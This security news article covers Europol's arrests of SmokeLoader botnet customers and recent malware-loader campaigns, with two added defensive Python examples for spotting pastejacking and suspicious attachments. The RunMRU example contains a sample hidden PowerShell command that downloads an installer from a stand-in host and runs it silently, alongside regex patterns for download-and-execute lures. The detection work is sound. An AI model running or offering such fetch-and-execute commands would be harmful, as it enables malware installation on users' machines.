Europol Arrests Five SmokeLoader Clients Linked by Seized Database Evidence

News Room
Last updated: 2025/04/10 at 6:52 AM
News Room Published 10 April 2025

Law enforcement authorities have announced that they tracked down the customers of the SmokeLoader malware and detained at least five individuals.

“In a coordinated series of actions, customers of the Smokeloader pay-per-install botnet, operated by the actor known as ‘Superstar,’ faced consequences such as arrests, house searches, arrest warrants or ‘knock and talks,’” Europol said in a statement.

Superstar is alleged to have run a pay-per-install service that enabled its customers to gain unauthorized access to victim machines, using the loader as a conduit to deploy next-stage payloads of their choice.

According to the European law enforcement agency, the access afforded by the botnet was used for various purposes such as keylogging, webcam access, ransomware deployment, and cryptocurrency mining.

The latest action is part of Operation Endgame, an ongoing coordinated exercise that last year led to the dismantling of online infrastructure associated with multiple malware loader operations, including IcedID, SystemBC, PikaBot, SmokeLoader, Bumblebee, and TrickBot.

Canada, the Czech Republic, Denmark, France, Germany, the Netherlands, and the United States participated in the follow-up effort that’s meant to focus on the “demand side” of the cybercrime ecosystem.


Authorities, per Europol, tracked down the customers who were registered in a database that was previously seized, linking their online personas to real-life individuals and calling them for questioning. An unspecified number of suspects are believed to have opted to cooperate and have their personal devices examined to collect digital evidence.

“Several suspects resold the services purchased from SmokeLoader at a markup, thus adding an additional layer of interest to the investigation,” Europol said. “Some of the suspects had assumed they were no longer on law enforcement’s radar, only to come to the harsh realisation that they were still being targeted.”

Malware Loaders Come in Different Forms

The development comes as Broadcom-owned Symantec revealed details of a phishing campaign that employs the Windows screensaver (SCR) file format to distribute a Delphi-based malware loader named ModiLoader (aka DBatLoader and NatsoLoader) on victims’ machines.

It also coincides with an evasive web campaign that tricks users into running malicious Windows installer (MSI) files to deploy another loader malware referred to as Legion Loader.

“This campaign uses a method called ‘pastejacking’ or ‘clipboard hijacking’ because viewers are instructed to paste content into a Run window,” Palo Alto Networks Unit 42 said, adding that the campaign relies on several cloaking strategies to evade detection, such as CAPTCHA pages and malware download pages disguised as blog sites.
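Because a pastejacking lure ends with the victim typing a command into the Run window, the Run dialog's history (the RunMRU registry key, which Windows updates on every Run-dialog submission) is one of the first places a responder can look. The Python below is an added example, not code from Unit 42 or the original article: it parses a constructed .reg export of that key, restores the most-recent-first order from the MRUList value, and flags commands matching indicator patterns commonly seen in such lures. The sample commands, the indicator patterns, and the example.invalid URL are assumptions for illustration, not Legion Loader's actual command line.

```python
import re

# Key as it appears in a .reg export of the Run dialog history.
RUNMRU_KEY = r"[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]"

# Constructed sample, shaped like the output of:
#   reg export "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" runmru.reg
# Each RunMRU value ends with a literal "\1", which the export escapes as "\\1".
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"MRUList"="bac"
"a"="notepad\\1"
"b"="powershell -w hidden -c \"iwr http://example.invalid/update.msi -OutFile $env:TEMP\\u.msi; msiexec /qn /i $env:TEMP\\u.msi\"\\1"
"c"="cmd\\1"
'''

# Assumed indicator patterns for pasted one-liners (hypothetical, not vendor signatures).
INDICATORS = [
    ("mshta", re.compile(r"\bmshta\b", re.I)),
    ("hidden powershell", re.compile(r"powershell[^\n]*-w(indowstyle)?\s+hidden", re.I)),
    ("encoded command", re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I)),
    ("download then execute",
     re.compile(r"(iwr|invoke-webrequest|curl|certutil|bitsadmin)[^\n]*"
                r"(iex|invoke-expression|msiexec|start-process|\|\s*cmd)", re.I)),
]

VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"$')


def unescape_reg(value: str) -> str:
    """Undo .reg string escaping: \\\\ becomes \\ and \\" becomes a quote."""
    return re.sub(r"\\(.)", r"\1", value)


def parse_runmru(reg_text: str) -> list:
    """Return the Run-dialog commands from a .reg export, most recent first."""
    in_key = False
    values = {}
    for line in reg_text.splitlines():
        if line.startswith("["):
            in_key = line.strip() == RUNMRU_KEY
            continue
        if not in_key:
            continue
        m = VALUE_RE.match(line.strip())
        if m:
            values[m.group(1)] = unescape_reg(m.group(2))
    order = values.pop("MRUList", "")  # slot letters, most recent first
    commands = []
    for slot in order:
        cmd = values.get(slot, "")
        if cmd.endswith("\\1"):  # strip the trailing "\1" marker Windows appends
            cmd = cmd[:-2]
        commands.append(cmd)
    return commands


def flag_pastejacking(reg_text: str) -> list:
    """Return (command, [matched indicator names]) for every suspicious Run entry."""
    findings = []
    for cmd in parse_runmru(reg_text):
        hits = [name for name, rx in INDICATORS if rx.search(cmd)]
        if hits:
            findings.append((cmd, hits))
    return findings


if __name__ == "__main__":
    for cmd, hits in flag_pastejacking(SAMPLE_REG):
        print(f"{', '.join(hits)}: {cmd}")
```

On a live host the same check can be run against `reg export` output or directly against the key; a hit should be correlated with the browser history around the same time, since the lure page that told the user what to paste is usually still in it.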

Phishing campaigns have also been a delivery vehicle for Koi Loader, which is then used to download and execute an information stealer called Koi Stealer as part of a multi-stage infection sequence.

“The utilization of Anti-VM capabilities by malware like Koi Loader and Koi Stealer highlights the capability of modern threats to evade analysis and detection by analysts, researchers, and sandboxes,” eSentire said in a report published last month.

And that’s not all. Recent months have once again witnessed the return of GootLoader (aka SLOWPOUR), which is being spread via sponsored search results on Google, a technique first spotted in early November 2024.

The attack targets users searching for “non disclosure agreement template” on Google and serves them bogus ads that, when clicked, redirect to a site (“lawliner[.]com”) where they are asked to enter their email addresses to receive the document.


“Shortly after they enter their email, they will receive an email from lawyer@skhm[.]org, with a link to their requested Word document (DOCX),” according to a security researcher who goes by the name GootLoader and has closely monitored the malware loader for several years.

“If the user passed all of their gates, they will download a zipped JavaScript file. When the user unzips and executes the JavaScript file, the same GootLoader behavior occurs.”
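Two of the delivery formats above are cheap to triage at the mail gateway or in a sandbox: the .scr "screensaver" used by the ModiLoader campaign is an ordinary PE executable under a different extension, and GootLoader's final stage arrives as a zipped JavaScript file. The Python below is an added example, not code from Symantec, the GootLoader researcher, or the original article. It checks whether a file with a directly executable extension really carries a PE header (DOS "MZ" stub, e_lfanew pointer, "PE\0\0" signature) and lists script files hidden inside zip archives; the extension lists, the minimal PE bytes, and the sample file names are constructed for illustration.

```python
import io
import struct
import zipfile

# Extensions Windows executes directly when double-clicked (assumed list).
EXEC_EXTS = {".scr", ".exe", ".pif", ".com", ".cpl"}
# Extensions handled by the Windows Script Host / mshta (assumed list).
SCRIPT_EXTS = {".js", ".jse", ".wsf", ".vbs", ".vbe", ".hta"}


def extension(name: str) -> str:
    """Last extension of a file name, lower-cased, with the dot ('' if none)."""
    lower = name.lower()
    return "." + lower.rsplit(".", 1)[-1] if "." in lower else ""


def is_pe(data: bytes) -> bool:
    """True if data has a DOS header whose e_lfanew points at a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def triage(name: str, data: bytes) -> list:
    """Return human-readable findings for one attachment (empty if nothing stands out)."""
    findings = []
    ext = extension(name)
    if ext in EXEC_EXTS and is_pe(data):
        findings.append(f"{name}: '{ext}' attachment is a PE executable")
    if zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for member in zf.namelist():
                mext = extension(member)
                if mext in SCRIPT_EXTS:
                    findings.append(f"{name}: archive contains script file {member}")
                elif mext in EXEC_EXTS and is_pe(zf.read(member)):
                    findings.append(f"{name}: archive contains PE executable {member}")
    return findings


# --- constructed sample inputs -------------------------------------------------

def minimal_pe() -> bytes:
    """Smallest byte string the check accepts: MZ stub, e_lfanew=0x40, PE signature."""
    hdr = bytearray(0x40)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    return bytes(hdr) + b"PE\0\0" + bytes(20)  # signature followed by a zeroed COFF header


def zipped_js() -> bytes:
    """In-memory zip holding a single .js file, like the GootLoader final stage."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("non disclosure agreement template.js", "// constructed placeholder\n")
    return buf.getvalue()


if __name__ == "__main__":
    for fname, blob in [("invoice.pdf.scr", minimal_pe()),
                        ("nda_template.zip", zipped_js()),
                        ("notes.txt", b"plain text")]:
        print(fname, "->", triage(fname, blob) or "clean")
```

The PE check deliberately keys on the header rather than the extension alone, so a renamed executable is caught while a genuine text file with an odd name is not; extend the archive branch to nested archives and ISO/IMG containers if those show up in your mail flow.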

Also spotted is a JavaScript downloader known as FakeUpdates (aka SocGholish) that’s typically propagated via social engineering ploys that deceive users into installing the malware by disguising as a legitimate update for web browsers like Google Chrome.

“Attackers distribute malware using compromised resources, injecting malicious JavaScript into vulnerable sites to fingerprint hosts, perform eligibility checks, and display fake update pages,” Google said. “The malware is commonly delivered via drive-by downloads. The malicious JavaScript acts as a downloader, delivering additional malware.”

The fake browser update attack pathway has also been observed distributing two other JavaScript malware families called FAKESMUGGLES, which is so named for the use of HTML smuggling to deliver next-stage payloads such as NetSupport Manager, and FAKETREFF, which communicates with a remote server to retrieve additional payloads like DarkGate and send basic host information.
